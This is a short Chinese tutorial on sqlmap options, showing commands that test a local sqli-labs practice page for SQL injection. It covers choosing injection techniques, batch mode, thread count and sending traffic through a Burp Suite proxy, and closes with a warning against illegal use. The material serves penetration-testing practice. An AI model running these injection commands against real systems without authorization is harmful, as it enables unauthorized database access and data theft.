zl程序教程

您现在的位置是:首页 >  其他

当前栏目

Sqlmap中代理及其他常用参数

2023-03-14 22:58:18 时间

一、不指定注入类型,会自动进行多种注入测试


sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1"

0a2653c851af460fa595bd959398a8f1.png


二、指定注入


1、指定联合注入


sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1" --technique U

0eacb84100b54626af849e6b562bf92a.png


2、指定联合加布尔注入


sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1" --technique UB

2d65d23f6d4748949b924e4057485923.png


三、指定其他注入


1、B:布尔注入


2、E:报错注入


3、U:联合注入


4、S:语句查询注入


5、T:延时注入


四、自动选择默认提示,不会弹出提示框让我们选择yes或no


sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1" --batch

2e9b90b2ca334476abebe75bafe6eeaa.png


五、指定线程数,最大线程数是10


sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1" --thread 5 --batch

4cebaac233b3433da32a72337a77fc60.png


六、设置代理


1、先设置好代理


6de278e6d6694ce5bb08e7e842b7e74b.png


2、sqlmap指定代理服务器


sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1" --proxy="http://127.0.0.1:8080"

7a399525ddec4b77923c464820b33738 (1).png


3、发送的所有payload,我们在BurpSuite中都可以看到


7a399525ddec4b77923c464820b33738.png8ec4f2997fb246878c34ecd6d122b7c6.png


禁止非法,后果自负